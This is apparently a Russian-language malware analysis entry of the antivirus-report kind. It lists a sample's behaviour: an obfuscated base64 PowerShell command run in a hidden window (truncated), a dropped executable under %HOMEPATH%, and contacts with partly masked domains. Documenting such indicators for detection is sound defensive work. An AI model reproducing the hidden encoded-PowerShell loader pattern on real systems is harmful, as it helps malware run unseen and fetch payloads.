Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAMwBJAFAAIAA9AFsAVAB5AFAARQBdACgAIgB7ADIAfQB7ADUAfQB7ADYAfQB7ADAAfQB7ADMAfQB7ADEAfQB7ADQAfQAiAC0ARgAgACcATQAuACcALAAnAGQAaQBSAEUAJwAsACcAUwAnACwAJwBpAE8ALgAnACwAJw...
- %HOMEPATH%\uflw5pa\w18vpk2\nfd9nts.exe
- %HOMEPATH%\uflw5pa\w18vpk2\nfd9nts.exe
- http://ca####anherbinc.ru/
- DNS ASK ne##help.gr
- DNS ASK co####erjungle.it
- DNS ASK po#####damsterdam.nl
- DNS ASK vi###napyme.com
- DNS ASK bo####upplies.com
- DNS ASK ma####sampietro.ch
- DNS ASK li##o.com
- DNS ASK si#####ngaspremier.org
- DNS ASK ca####anherbinc.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAMwBJAFAAIAA9AFsAVAB5AFAARQBdACgAIgB7ADIAfQB7ADUAfQB7ADYAfQB7ADAAfQB7ADMAfQB7ADEAfQB7ADQAfQAiAC0ARgAgACcATQAuACcALAAnAGQAaQBSAEUAJwAsACcAUwAnACwAJwBpAE8ALgAnACwAJw...' (со скрытым окном)